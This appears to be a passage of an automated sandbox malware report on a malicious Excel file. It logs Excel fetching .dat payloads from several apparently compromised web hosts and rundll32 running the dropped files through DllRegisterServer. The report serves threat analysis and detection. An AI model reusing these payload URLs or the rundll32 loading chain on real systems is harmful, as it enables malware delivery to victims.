                                                                                                                                                Host: pathinanchilearthmovers.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Feb 23, 2021 14:25:54.569462061 CET3145INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 23 Feb 2021 13:25:53 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                Connection: Upgrade, Keep-Alive
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Expires: Tue, 23 Feb 2021 13:30:53 GMT
                                                                                                                                                X-Endurance-Cache-Level: 2
                                                                                                                                                Content-Length: 0
                                                                                                                                                Keep-Alive: timeout=5, max=75
                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.449734138.36.237.10080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 23, 2021 14:25:55.179770947 CET3152OUTGET /xjzpfwc/44250601302777800000.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: jugueterialatorre.com.ar
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Feb 23, 2021 14:25:56.756165028 CET3172INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Tue, 23 Feb 2021 13:25:55 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-Powered-By: PHP/7.3.20
                                                                                                                                                Set-Cookie: e34c2f879dc85bcd47ed95fb5d2ec3c0=aeb533e0c294d8bd86e1094b2dd7b492; path=/; secure; HttpOnly
                                                                                                                                                Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                Last-Modified: Tue, 23 Feb 2021 13:25:56 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Location: https://jugueterialatorre.com.ar/xjzpfwc/44250601302777800000.dat
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Feb 23, 2021 14:25:56.756186962 CET3172INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                3192.168.2.44973891.199.212.5280C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 23, 2021 14:25:57.848548889 CET3185OUTGET /SectigoRSADomainValidationSecureServerCA.crt HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                                Host: crt.sectigo.com
                                                                                                                                                Feb 23, 2021 14:25:57.911541939 CET3187INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Tue, 23 Feb 2021 13:25:57 GMT
                                                                                                                                                Content-Type: application/pkix-cert
                                                                                                                                                Content-Length: 1559
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Last-Modified: Fri, 02 Nov 2018 00:00:00 GMT
                                                                                                                                                ETag: "5bdb9380-617"
                                                                                                                                                X-CCACDN-Mirror-ID: sscrl1
                                                                                                                                                Cache-Control: max-age=14400, s-maxage=3600
                                                                                                                                                X-CCACDN-Proxy-ID: mcdpinlb5
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Data Raw: 30 82 06 13 30 82 03 fb a0 03 02 01 02 02 10 7d 5b 51 26 b4 76 ba 11 db 74 16 0b bc 53 0d a7 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 81 88 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 4e 65 77 20 4a 65 72 73 65 79 31 14 30 12 06 03 55 04 07 13 0b 4a 65 72 73 65 79 20 43 69 74 79 31 1e 30 1c 06 03 55 04 0a 13 15 54 68 65 20 55 53 45 52 54 52 55 53 54 20 4e 65 74 77 6f 72 6b 31 2e 30 2c 06 03 55 04 03 13 25 55 53 45 52 54 72 75 73 74 20 52 53 41 20 43 65 72 74 69 66 69 63 61 74 69 6f 6e 20 41 75 74 68 6f 72 69 74 79 30 1e 17 0d 31 38 31 31 30 32 30 30 30 30 30 30 5a 17 0d 33 30 31 32 33 31 32 33 35 39 35 39 5a 30 81 8f 31 0b 30 09 06 03 55 04 06 13 02 47 42 31 1b 30 19 06 03 55 04 08 13 12 47 72 65 61 74 65 72 20 4d 61 6e 63 68 65 73 74 65 72 31 10 30 0e 06 03 55 04 07 13 07 53 61 6c 66 6f 72 64 31 18 30 16 06 03 55 04 0a 13 0f 53 65 63 74 69 67 6f 20 4c 69 6d 69 74 65 64 31 37 30 35 06 03 55 04 03 13 2e 53 65 63 74 69 67 6f 20 52 53 41 20 44 6f 6d 61 69 6e 20 56 61 6c 69 64 61 74 69 6f 6e 20 53 65 63 75 72 65 20 53 65 72 76 65 72 20 43 41 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 d6 73 33 d6 d7 3c 20 d0 00 d2 17 45 b8 d6 3e 07 a2 3f c7 41 ee 32 30 c9 b0 6c fd f4 9f cb 12 98 0f 2d 3f 8d 4d 01 0c 82 0f 17 7f 62 2e e9 b8 48 79 fb 16 83 4e ad d7 32 25 93 b7 07 bf b9 50 3f a9 4c c3 40 2a e9 39 ff d9 81 ca 1f 16 32 41 da 80 26 b9 23 7a 87 20 1e e3 ff 20 9a 3c 95 44 6f 87 75 06 90 40 b4 32 93 16 09 10 08 23 3e d2 dd 87 0f 6f 5d 51 14 6a 0a 69 c5 4f 01 72 69 cf d3 93 4c 6d 04 a0 a3 1b 82 7e b1 9a b9 ed c5 9e c5 37 78 9f 9a 08 34 fb 56 2e 58 c4 09 0e 06 64 5b bc 37 dc f1 9f 28 68 a8 56 b0 92 a3 5c 9f bb 88 98 08 1b 24 1d ab 30 85 ae af b0 2e 9e 7a 9d c1 c0 42 1c e2 02 f0 ea e0 4a d2 ef 90 0e b4 c1 40 16 f0 6f 85 42 4a 64 f7 a4 30 a0 fe bf 2e a3 27 5a 8e 8b 58 b8 ad c3 19 17 84 63 ed 6f 56 fd 83 cb 60 34 c4 74 be e6 9d db e1 e4 e5 ca 0c 5f 15 02 03 01 00 01 a3 82 01 6e 30 82 01 6a 30 1f 06 03 55 1d 23 04 18 30 16 80 14 53 79 bf 5a aa 2b 4a cf 54 80 e1 d8 9b c0 9d f2 b2 03 66 cb 30 1d 06 03 55 1d 0e 04 16 04 14 8d 8c 5e c4 54 ad 8a e1 77 e9 9b f9 9b 05 e1 b8 01 8d 61 e1 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 01 86 30 12 06 03 55 1d 13 01 01 ff 04 08 30 06 01 01 ff 02 01 00 30 1d 06 03 55 1d 25 04 16 30 14 06 08 2b 06 01 05 05 07 03 01 06 08 2b 06 01 05 05 07 03 02 30 1b 06 03 55 1d 20 04 14 30 12 30 06 06 04 55 1d 20 00 30 08 06 06 67 81 0c 01 02 01 30 50 06 03 55 1d 1f 04 49 30 47 30 45 a0 43 a0 41 86 3f 68 74 74 70 3a 2f 2f 63 72 6c 2e 75 73 65 72 74 72 75 73 74 2e 63 6f 6d 2f 55 53 45 52 54 72 75 73 74 52 53 41 43 65 72 74 69 66 69 63 61 74 69 6f 6e 41 75 74 68 6f 72 69 74 79 2e 63 72 6c 30 76 06 08 2b 06 01 05 05 07 01 01 04 6a 30 68 30
                                                                                                                                                Data Ascii: 00}[Q&vtS0*H010UUS10UNew Jersey10UJersey City10UThe USERTRUST Network1.0,U%USERTrust RSA Certification Authority0181102000000Z301231235959Z010UGB10UGreater Manchester10USalford10USectigo Limited1705U.Sectigo RSA Domain Validation Secure Server CA0"0*H0s3< E>?A20l-?Mb.HyN2%P?L@*92A&#z <Dou@2#>o]QjiOriLm~7x4V.Xd[7(hV\$0.zBJ@oBJd0.'ZXcoV`4t_n0j0U#0SyZ+JTf0U^Twa0U0U00U%0++0U 00U 0g0PUI0G0ECA?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v+j0h0
                                                                                                                                                Feb 23, 2021 14:25:57.911576986 CET3187INData Raw: 3f 06 08 2b 06 01 05 05 07 30 02 86 33 68 74 74 70 3a 2f 2f 63 72 74 2e 75 73 65 72 74 72 75 73 74 2e 63 6f 6d 2f 55 53 45 52 54 72 75 73 74 52 53 41 41 64 64 54 72 75 73 74 43 41 2e 63 72 74 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70
                                                                                                                                                Data Ascii: ?+03http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%+0http://ocsp.usertrust.com0*H2aHOGMxopR13WR1kT@h|U69QF~I*6h9zNVo{;w8_~FHh


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                4192.168.2.44974372.52.227.18080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 23, 2021 14:26:02.659064054 CET3253OUTGET /fdzgprclatqo/44250601302777800000.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: rzminc.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Feb 23, 2021 14:26:03.122876883 CET3282INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 23 Feb 2021 13:26:02 GMT
                                                                                                                                                Server: Apache/2.4.46 (CentOS)
                                                                                                                                                X-Powered-By: PHP/7.3.27
                                                                                                                                                Upgrade: h2
                                                                                                                                                Connection: keep-alive, close
                                                                                                                                                Cache-Control: private, must-revalidate
                                                                                                                                                Expires: Tue, 23 Feb 2021 13:26:02 GMT
                                                                                                                                                Content-Length: 0
                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                HTTPS Packets

                                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                Feb 23, 2021 14:25:57.339196920 CET138.36.237.100443192.168.2.449737CN=jugueterialatorre.com.ar CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Jun 02 02:00:00 CEST 2020 Mon Nov 06 13:23:33 CET 2017Thu Jun 03 01:59:59 CEST 2021 Sat Nov 06 13:23:33 CET 2027771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Nov 06 13:23:33 CET 2017Sat Nov 06 13:23:33 CET 2027

                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:14:25:47
                                                                                                                                                Start date:23/02/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x9e0000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:14:26:03
                                                                                                                                                Start date:23/02/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:rundll32 ..\JDFR.hdfgr,DllRegisterServer
                                                                                                                                                Imagebase:0x1310000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:14:26:03
                                                                                                                                                Start date:23/02/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:rundll32 ..\JDFR.hdfgr1,DllRegisterServer
                                                                                                                                                Imagebase:0x1310000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:14:26:04
                                                                                                                                                Start date:23/02/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:rundll32 ..\JDFR.hdfgr2,DllRegisterServer
                                                                                                                                                Imagebase:0x1310000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:14:26:04
                                                                                                                                                Start date:23/02/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:rundll32 ..\JDFR.hdfgr3,DllRegisterServer
                                                                                                                                                Imagebase:0x1310000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:14:26:04
                                                                                                                                                Start date:23/02/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:rundll32 ..\JDFR.hdfgr4,DllRegisterServer
                                                                                                                                                Imagebase:0x1310000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >